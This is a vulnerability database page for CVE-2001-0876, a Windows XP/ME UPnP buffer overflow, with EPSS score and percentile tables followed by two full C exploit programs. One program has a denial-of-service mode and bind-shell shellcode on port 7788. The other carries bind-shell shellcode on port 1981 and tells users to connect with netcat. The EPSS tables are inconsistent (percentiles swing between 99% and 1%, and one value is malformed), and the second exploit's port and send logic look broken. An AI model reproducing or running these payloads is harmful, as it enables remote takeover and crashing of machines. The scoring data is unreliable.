CVE-2001-0876 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	60.62%	–	–
2023-03-12	–	–	–	96.84%	–
2023-06-04	–	–	–	96.84%	–
2024-06-02	–	–	–	96.84%	–
2024-12-22	–	–	–	95.14%	–
2025-01-19	–	–	–	95.14%	–
2025-03-18	–	–	–	–	81.11%
2025-03-30	–	–	–	–	81.68%
2025-03-30	–	–	–	–	81.68,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-06-04	1%
2024-06-02	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

// source: https://www.securityfocus.com/bid/3723/info Universal Plug and Play, or UPnP, is a service that allows for hosts to locate and use devices on the local network. UPnP support ships with Windows XP and ME. For Windows 98 and 98SE, it is available with Windows XP's Internet Connection Sharing client. It should be noted that UPnP services are enabled on Windows XP by default. When processing the location field in a NOTIFY directive, UPnP server process memory can be overwritten by data that originated in the packet. If the IP address, port and filename components are of excessive length, access violations will occur when the server attempts to dereference pointers overwritten with data from the packet. It should be noted that the service listens on broadcast and multicast interfaces. This could permit an attacker to exploit a number of systems without knowing their individual IP addresses, if they employed an exploitation method targeting a UDP port. It is however possible to exploit this condition using either the TCP or UDP protocols. The UPnP service runs in the LOCAL SERVICE security context. An attacker who successfully exploits this vulnerability could gain control over the target host. /* * WinME/XP UPNP dos & overflow * * Run: ./XPloit host <option> * * Windows run the "Universal Plug and Play technology" service * at port 5000. In the future this will allow for seemless * connectivity of various devices such as a printer. * This service have a DoS and a buffer overflow I exploit here. * * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno * * Author: Gabriel Maggiotti * Email: gmaggiot@ciudad.com.ar * Webpage: http://qb0x.net */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> #include <unistd.h> #include <fcntl.h> #define MAX 10000 #define PORT 5000 #define FREEZE 512 #define NOP 0x43 //inc ebx, instead of 0x90 /***************************************************************************/ int main(int argc,char *argv[]) { int sockfd[MAX]; char sendXP[]="XP"; char jmpcode[281], execode[840],request[2048]; char *send_buffer; int num_socks; int bindport; int i; int port; unsigned char shellcode[] = "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90" "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa" "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36" "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97" "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14" "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2" "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14" "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5" "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1" "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16" "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68" "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1" "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94" "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4" "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68" "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57" "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4" "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4" "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5" "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68" "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67" "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1" "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf" "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab" "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0" "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4" "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0" "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56" "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7" "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57" "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4" "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f" "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7" "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68" "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f" &nbsp; "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75" "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0" "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5" "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2" "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6" "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97" "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc" "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb" "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97" "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2" "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4" "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97" "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2" "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97" "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97" "\x68\x68\x68\x68"; struct hostent *he; struct sockaddr_in their_addr; if(argc!=3) { fprintf(stderr,"usage:%s <hostname> <command>\n",argv[0]); fprintf(stderr,"-f freeze the machine.\n"); fprintf(stderr,"-e exploit.\n"); exit(1); } if(strstr(argv[2],"-f")) { num_socks=FREEZE; send_buffer=sendXP; } if(strstr(argv[2],"-e")) { num_socks=1; send_buffer=request; bindport^=0x9797; shellcode[778]= (bindport) & 0xff; shellcode[779]= (bindport >> 8) & 0xff; for(i = 0; i < 268; i++) jmpcode[i] = (char)NOP; jmpcode[268] = (char)0x4d; jmpcode[269] = (char)0x3f; jmpcode[270] = (char)0xe3; jmpcode[271] = (char)0x77; jmpcode[272] = (char)0x90; jmpcode[273] = (char)0x90; jmpcode[274] = (char)0x90; jmpcode[275] = (char)0x90; //jmp [ebx+0x64], jump to execute shellcode jmpcode[276] = (char)0xff; jmpcode[277] = (char)0x63; jmpcode[278] = (char)0x64; jmpcode[279] = (char)0x90; jmpcode[280] = (char)0x00; for(i = 0; i < 32; i++) execode[i] = (char)NOP; execode[32]=(char)0x00; strcat(execode, shellcode); snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, execode); } if((he=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } /***************************************************************************/ for(i=0; i<num_socks;i++) if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family=AF_INET; their_addr.sin_port=htons(PORT); their_addr.sin_addr=*((struct in_addr*)he->h_addr); bzero(&(their_addr.sin_zero),8); for(i=0; i<num_socks;i++) if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1) { perror("connect"); exit(1); } for(i=0; i<num_socks;i++) if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1) { perror("send"); exit(0); } for(i=0; i<num_socks;i++) close(sockfd[i]); return 0; }

// source: https://www.securityfocus.com/bid/3723/info Universal Plug and Play, or UPnP, is a service that allows for hosts to locate and use devices on the local network. UPnP support ships with Windows XP and ME. For Windows 98 and 98SE, it is available with Windows XP's Internet Connection Sharing client. It should be noted that UPnP services are enabled on Windows XP by default. When processing the location field in a NOTIFY directive, UPnP server process memory can be overwritten by data that originated in the packet. If the IP address, port and filename components are of excessive length, access violations will occur when the server attempts to dereference pointers overwritten with data from the packet. It should be noted that the service listens on broadcast and multicast interfaces. This could permit an attacker to exploit a number of systems without knowing their individual IP addresses, if they employed an exploitation method targeting a UDP port. It is however possible to exploit this condition using either the TCP or UDP protocols. The UPnP service runs in the LOCAL SERVICE security context. An attacker who successfully exploits this vulnerability could gain control over the target host. /* ***************** EXPLOIT CODED BY JOCANOR ***************** **************PRIVATE DO NOT DISTRIBUTE********************* this is a new and functional exploit for de vulnerability affects to windows xp, at the service UPNP, port 5000. this exploit is a part of ASQ12 project, same as XPhack.c coded also be me... you only type: argoxp victimip and later, in another cmd type: nc victimip 1981 note: you need netcat. note2: this exploit affects to windows xp + sp0 english version. ***************** EXPLOIT CODED BY JOCANOR ***************** */ #include <stdio.h> #include <windows.h> #pragma comment(lib, "ws2_32") char shell[] = //bind port 1981 "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85" "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A" "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A" "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC" "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58" "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12" "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71" "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3" "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66" "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3" "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66" "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B" "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99" "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5" "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71" "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32" "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6" "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9" "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA" "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8" "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC" "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8" "\xFA\xFA\xFC\xE9\xED\x99"; int main(int argc, char *argv[]) { char recvbuf[1600]; char szRequest[2048]; char szJmpCode[281]; char szExeCode[840]; int i; WSADATA wsa; struct hostent *he; struct sockaddr_in their_addr; int len, sockfd; short dport = 445; printf("\n ArgoXP 1.0 beta \n"); printf(" ExPlOiT CoDeD By: JoCaNoR \n"); printf("Member of: SlackTeam...Jocanor, nkde, zet4 & zerok\n"); printf(" .-.-.Especial thanks to Neo_geno & Lide.-.-.\n\n"); if (argc < 2) { printf("How to use: "); printf("Argoxp <victim ip>\n\n"); exit(0); } for(i=0; i<268; i++) szJmpCode[i]=(char)0x90; szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F; szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77; szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90; szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90; szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63; szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90; szJmpCode[280]=(char)0x00; for(i=0; i<32; i++) szExeCode[i]=(char)0x90; szExeCode[32]=(char)0x00; strcat(szExeCode, shell); sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode); WSAStartup(MAKEWORD(2,0),&wsa); if ((he=gethostbyname(argv[1])) == NULL) { perror("Unable to resolve"); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket error"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(dport); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); printf("Waiting for connection..."); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("\nError, unable to connect!!!"); exit(1); } printf("Connected!!!\n"); if (send(sockfd, shell, sizeof(shell)-1, 0) == -1) { printf("Error :(:(:(\n"); exit(1); } printf("OoOoOps shell!!\n"); len = recv(sockfd, recvbuf, 1600, 0); return 0; } //***************** EXPLOIT CODED BY JOCANOR *****************